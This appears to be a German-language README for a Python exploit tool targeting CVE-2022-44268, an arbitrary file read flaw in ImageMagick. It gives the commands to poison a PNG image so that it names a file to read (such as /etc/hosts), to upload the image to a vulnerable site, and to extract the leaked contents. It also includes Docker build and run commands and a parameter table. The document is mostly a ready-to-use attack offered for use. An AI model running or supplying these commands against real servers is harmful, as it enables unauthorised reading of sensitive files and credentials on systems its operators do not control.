
Python-basierter Exploit für CVE-2022-44268, eine Schwachstelle zum beliebigen Auslesen von Dateien in ImageMagick. Vergiftet PNG-Bilder, um sensible Dateien von anfälligen Hosts über Web-Upload auszulesen.
CVE-2022-44268 ImageMagick Beliebiger Dateizugriff
Bild vergiften ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Lade das vergiftete PNG-Bild hoch. Überprüfe, ob der Exploit erfolgreich war 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Erstellen
docker build -t cve-2022-44268 .
Ausführen
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Parameter |
|---|
| Beschreibung |
|---|
| Typ |
|---|
| --url | Die URL des hochgeladenen PNG-Bildes | String |
| --image | Eingabe-PNG-Datei | File |
| --output | Ausgabe-PNG-Datei | File |
| --file-to-read | Datei, die vom anfälligen Host gelesen werden soll | String |